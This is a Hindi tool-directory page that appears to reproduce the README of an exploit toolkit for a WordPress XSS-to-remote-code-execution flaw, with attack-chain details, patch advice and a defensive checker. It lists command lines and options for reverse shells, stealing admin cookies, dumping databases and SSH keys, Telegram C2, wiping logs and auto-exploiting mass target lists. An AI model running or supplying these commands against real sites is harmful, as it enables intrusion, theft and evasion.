Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-64638-PoC-Exploit — 🛡️ CVE-2026-64638 - WordPress सुरक्षा मूल्यांकन सुइट (CVSS 8.9) | WordPress 4.7.0-7.0.2 पेंटेस्ट टूलकिट। इसमें भेद्यता मूल्यांकन और उन्नत विश्लेषण मॉड्यूल शामिल हैं। 🐍 सुरक्षित जांच और शोषण, 2 मोड। उन्नत ब्लू और रेड टीम सर्वश्रेष्ठ 2026-64638 टूलकिट, केवल अधिकृत उपयोग। कानूनी रहें <3zd | Kitploit
उपकरण/GitHubGitHub/tc4dy/cve-2026-64638-poc-exploit
विशेषाधिकार वृद्धिभेद्यता स्कैनरमेमोरी फोरेंसिकस्थायित्व तंत्रशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

🛡️ CVE-2026-64638 - WordPress सुरक्षा मूल्यांकन सुइट (CVSS 8.9) | WordPress 4.7.0-7.0.2 पेंटेस्ट टूलकिट। इसमें भेद्यता मूल्यांकन और उन्नत विश्लेषण मॉड्यूल शामिल हैं। 🐍 सुरक्षित जांच और शोषण, 2 मोड। उन्नत ब्लू और रेड टीम सर्वश्रेष्ठ 2026-64638 टूलकिट, केवल अधिकृत उपयोग। कानूनी रहें <3zd

GitHubtc4dy/cve-2026-64638-poc-exploit

CVE-2026-64638-PoC-Exploit

रिपॉजिटरी देखें
181 महीना पहलेअभी तक समीक्षित नहीं
साझा करें

CVE PoC

🌀 CVE‑2026‑64638 – वर्डप्रेस XSS2Shell सुरक्षा सूट

Python 3.8+ CVSS Author WordPress

⚠️ केवल नैतिक उपयोग – अधिकृत सुरक्षा परीक्षण
यह रिपॉजिटरी केवल अधिकृत सुरक्षा पेशेवरों, ब्लू टीमों और पेनिट्रेशन टेस्टर्स के लिए उपकरण प्रदान करती है।
कंप्यूटर सिस्टम तक अनधिकृत पहुँच CFAA (अमेरिका), कंप्यूटर मिसयूज़ एक्ट (यूके), TCK 243/244 (तुर्की), और दुनिया भर के समान कानूनों के तहत अवैध है।


📖 भेद्यता अवलोकन

CVE‑2026‑64638 वर्डप्रेस कोर संस्करण 4.7.0 से 7.0.2 में एक गंभीर प्री-ऑथेंटिकेशन रिफ्लेक्टेड XSS भेद्यता है, जो किसी हमलावर को XSS हमले को पूर्ण रिमोट कोड निष्पादन (RCE) तक बढ़ाने की अनुमति देती है, जो एप्लिकेशन पासवर्ड सुविधा के माध्यम से होता है।

यह कैसे काम करता है

  1. पार्सर विभेद (Parser Differential) – PHP का strip_tags() और WordPress का wp_kses_post() HTML टैग को अलग-अलग तरीके से पार्स करते हैं, जिससे दुर्भावनापूर्ण इनपुट सैनिटाइज़ेशन को पार कर सकता है।
  2. रिफ्लेक्टेड XSS – एक हमलावर लॉगिन फ़ॉर्म (wp-login.php) में एक विशेष रूप से तैयार पेलोड इंजेक्ट करता है। असफल लॉगिन पर, पेलोड वापस परावर्तित होता है और पीड़ित के ब्राउज़र में निष्पादित होता है।
  3. एप्लिकेशन पासवर्ड का दुरुपयोग – इंजेक्टेड JavaScript स्वचालित रूप से WordPress REST API के माध्यम से एक एप्लिकेशन पासवर्ड उत्पन्न करता है, जिसे हमलावर तक बाहर निकाला जाता है।
  4. प्लगइन अपलोड (RCE) – कैप्चर किए गए एप्लिकेशन पासवर्ड का उपयोग करके, हमलावर एडमिन पैनल में प्रमाणित होता है और एक वेबशेल युक्त दुर्भावनापूर्ण प्लगइन अपलोड करता है।
  5. पूर्ण सिस्टम समझौता – वेबशेल सिस्टम कमांड निष्पादन प्रदान करता है, जिससे रिवर्स शेल, पर्सिस्टेंस, लेटरल मूवमेंट और पूर्ण सर्वर अधिग्रहण संभव होता है।

प्रभावित संस्करण

  • WordPress 4.7.0 – 7.0.2 – असुरक्षित
  • WordPress 7.0.3 और बाद के संस्करण – पैच किया गया
  • सुरक्षा अपडेट सभी अनुरक्षित शाखाओं में बैकपोर्ट किए गए हैं

पैच

  • WordPress 7.0.3 या नए संस्करण में अपग्रेड करें।
  • यदि अपग्रेड संभव नहीं है, तो अस्थायी काम-चालू समाधान के रूप में एप्लिकेशन पासवर्ड सुविधा अक्षम करें।

🧰 उपकरण

उपकरणउद्देश्यअभिप्रेत उपयोगकर्ता
exploit.pyरिवर्स शेल, पर्सिस्टेंस, C2, प्रिविलेज एस्केलेशन, मेमोरी फोरेंसिक्स, डेटाबेस डंप, SSH कुंजी निष्कर्षण और मास स्कैनिंग के साथ पूर्ण शोषण टूलकिट।रेड टीमें / अधिकृत पेंटेस्टर

📊 फीचर तुलना


🎯 उपयोग केस सारांश


⚙️ इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]

📋 पैरामीटर

exploit.py पैरामीटर

safecheck.py पैरामीटर


💥 परिदृश्य


📊 इंटरैक्टिव शेल कमांड


🧪 एंडपॉइंट और API उपयोग

एंडपॉइंटउद्देश्य
/wp-login.phpलॉगिन पेज – XSS इंजेक्शन बिंदु
/wp-admin/authorize-application.php

🛡️ जिम्मेदार उपयोग

  • इन उपकरणों का उपयोग केवल उन प्रणालियों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
  • अनधिकृत पहुँच अवैध और अनैतिक है।
  • लेखक किसी भी दुरुपयोग के लिए उत्तरदायी नहीं हैं।
  • हमेशा अपने देश के कानूनों और विनियमों का पालन करें।

यह सॉफ़्टवेयर केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।

कानूनी अनुपालन

टूल डाउनलोड करें
safecheck.pyगैर-आक्रामक भेद्यता जाँचकर्ता जो XSS रिफ्लेक्शन का पता लगाता है और बिना किसी दुर्भावनापूर्ण पेलोड निष्पादित किए सुरक्षा स्थिति का आकलन करता है। विस्तृत रिपोर्ट उत्पन्न करता है।ब्लू टीमें / सुरक्षा ऑडिटर
फीचरexploit.pysafecheck.py
भेद्यता का पता लगाना✅✅
WordPress संस्करण का पता लगाना✅✅
XSS रिफ्लेक्शन का पता लगाना✅✅
एप्लिकेशन पासवर्ड कैप्चर✅❌
प्लगइन अपलोड (RCE)✅❌
रिवर्स शेल✅❌
C2 बीकनिंग (HTTP/DNS/Telegram)✅❌
प्रिविलेज एस्केलेशन✅❌
मेमोरी फोरेंसिक्स✅❌
डेटाबेस डंप✅❌
SSH कुंजी निष्कर्षण✅❌
पर्सिस्टेंस विधियाँ✅❌
सुरक्षा हेडर ऑडिट❌✅
कॉन्फ़िग फ़ाइल एक्सपोज़र जाँच❌✅
डायरेक्टरी लिस्टिंग जाँच❌✅
phpinfo एक्सपोज़र जाँच❌✅
मास स्कैनिंग✅✅
प्रॉक्सी समर्थन✅✅
Tor समर्थन✅✅
Ngrok टनलिंग✅❌
इंटरैक्टिव शेल✅❌
गैर-आक्रामक (सुरक्षित) मोड❌✅
JSON / रिपोर्ट आउटपुट✅✅
परिदृश्यअनुशंसित उपकरण
ब्लू टीम – यह सत्यापित करना कि आपका WordPress इंस्टॉलेशन असुरक्षित हैsafecheck.py
सुरक्षा ऑडिट – गैर-आक्रामक भेद्यता मूल्यांकनsafecheck.py
रेड टीम – पूर्ण शोषण के साथ अधिकृत पेनिट्रेशन परीक्षणexploit.py
बग बाउंटी – जिम्मेदार प्रकटीकरण परीक्षणsafecheck.py
मास स्कैनिंग – कई लक्ष्यों को भेद्यता के लिए जाँचनाexploit.py या safecheck.py
इंसिडेंट रिस्पॉन्स – जाँचना कि सिस्टम से समझौता हुआ है या नहींsafecheck.py
उन्नत पोस्ट-एक्सप्लॉइटेशन – पर्सिस्टेंस, C2, फोरेंसिक्सexploit.py
पैरामीटरविवरण
-t, --targetलक्ष्य WordPress URL (जैसे https://wordpress-site.com)
-l, --listमास स्कैनिंग के लिए लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक)
--lhostरिवर्स शेल कॉलबैक के लिए स्थानीय IP पता
--lportरिवर्स शेल के लिए स्थानीय पोर्ट (डिफ़ॉल्ट: 4444)
--proxyHTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080)
--timeoutअनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)
--retryपुनः प्रयासों की संख्या (डिफ़ॉल्ट: 3)
--threadsमास स्कैनिंग के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 5)
--exploitमास स्कैन के दौरान असुरक्षित लक्ष्यों का स्वतः शोषण करें
--ngrok-tokenबाहरी टनलिंग के लिए Ngrok ऑथटोकन
--payload-typeXSS पेलोड प्रकार: reflected, dom_based, waf_bypass, case_manipulation, double_encoded
--session-hijackसत्र अपहरण सक्षम करें (एडमिन कुकीज़ चुराएँ)
--dump-dbWordPress डेटाबेस डंप करें (pymysql आवश्यक है)
--extract-sshलक्ष्य सिस्टम से SSH कुंजियाँ निकालें
--torट्रैफ़िक को Tor के माध्यम से रूट करें (socks5h://127.0.0.1:9050)
--stealthस्टील्थ मोड सक्षम करें (हेडर स्पूफ करें, अनुरोधों में देरी करें)
--no-cleanupशोषण के बाद लॉग क्लीनअप छोड़ें
--ssl-verifySSL प्रमाणपत्र सत्यापित करें
--c2-typeC2 प्रकार: http, dns, telegram
--c2-serverC2 सर्वर URL या Telegram बॉट टोकन
--auto-priv-escशेल के बाद स्वतः प्रिविलेज एस्केलेशन
--memory-forensicsमेमोरी फोरेंसिक्स मॉड्यूल सक्षम करें
-v, --verboseविस्तृत आउटपुट
-q, --quietशांत मोड (न्यूनतम आउटपुट)
पैरामीटरविवरण
-t, --targetलक्ष्य WordPress URL (जैसे https://wordpress-site.com)
-l, --listमास स्कैनिंग के लिए लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक)
--timeoutअनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)
--retryपुनः प्रयासों की संख्या (डिफ़ॉल्ट: 3)
--threadsमास स्कैनिंग के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 5)
--proxyHTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080)
--torट्रैफ़िक को Tor के माध्यम से रूट करें (socks5h://127.0.0.1:9050)
--ssl-verifySSL प्रमाणपत्र सत्यापित करें
--outputआउटपुट JSON रिपोर्ट फ़ाइल
-v, --verboseविस्तृत आउटपुट
-q, --quietशांत मोड (न्यूनतम आउटपुट)
#परिदृश्यकमांड
1त्वरित भेद्यता जाँचpython safecheck.py -t https://wordpress-site.com
2रिपोर्ट के साथ विस्तृत स्कैनpython safecheck.py -t https://wordpress-site.com --output report.json -v
3रिवर्स शेल के साथ पूर्ण शोषणpython exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit
4कस्टम XSS पेलोड का उपयोग करेंpython exploit.py -t https://wordpress-site.com --payload-type waf_bypass
5सत्र अपहरण (एडमिन कुकीज़ चुराएँ)python exploit.py -t https://wordpress-site.com --session-hijack
6WordPress डेटाबेस डंप करेंpython exploit.py -t https://wordpress-site.com --dump-db
7SSH कुंजियाँ निकालेंpython exploit.py -t https://wordpress-site.com --extract-ssh
8गुमनामी के लिए Tor का उपयोग करेंpython exploit.py -t https://wordpress-site.com --tor --stealth
9Telegram के साथ C2 बीकनिंगpython exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id"
10फ़ाइल से मास स्कैनिंगpython exploit.py -l targets.txt --threads 10 --exploit
11शेल के बाद मेमोरी फोरेंसिक्सpython exploit.py -t https://wordpress-site.com --memory-forensics
12स्वतः प्रिविलेज एस्केलेशनpython exploit.py -t https://wordpress-site.com --auto-priv-esc
13इंटरैक्टिव शेलpython exploit.py -t https://wordpress-site.com -i
14Ngrok टनलिंगpython exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN
कमांडविवरण
reverseरिवर्स शेल लिसनर प्रारंभ करें
persistपर्सिस्टेंस विधियाँ लागू करें (cron, systemd, rc.local, SSH, WP)
cleanसिस्टम लॉग और इतिहास साफ़ करें
dumpdbWordPress डेटाबेस डंप करें
sshSSH कुंजियाँ निकालें
privस्वतः प्रिविलेज एस्केलेशन
memमेमोरी फोरेंसिक्स चलाएँ
c2C2 स्थिति दिखाएँ
c2taskC2 कार्यों की जाँच करें
exitइंटरैक्टिव शेल से बाहर निकलें
एप्लिकेशन पासवर्ड जनरेशन
/wp-admin/update.php?action=upload-pluginप्लगइन अपलोड (RCE)
/wp-content/plugins/{slug}/{slug}.phpवेबशेल निष्पादन
देशप्रासंगिक कानून
संयुक्त राज्य अमेरिकाComputer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030
यूनाइटेड किंगडमComputer Misuse Act 1990
तुर्कीTCK 243 (अनधिकृत पहुँच), TCK 244 (सिस्टम हस्तक्षेप)
जर्मनीStGB § 202a (डेटा जासूसी), § 202b (डेटा अवरोधन)
फ्रांसLoi Godfrain – Article 323-1
ऑस्ट्रेलियाCybercrime Act 2001
कनाडाCriminal Code – धारा 342.1
भारतInformation Technology Act 2000 – धारा 43, 66
जापानAct on Prohibition of Unauthorized Computer Access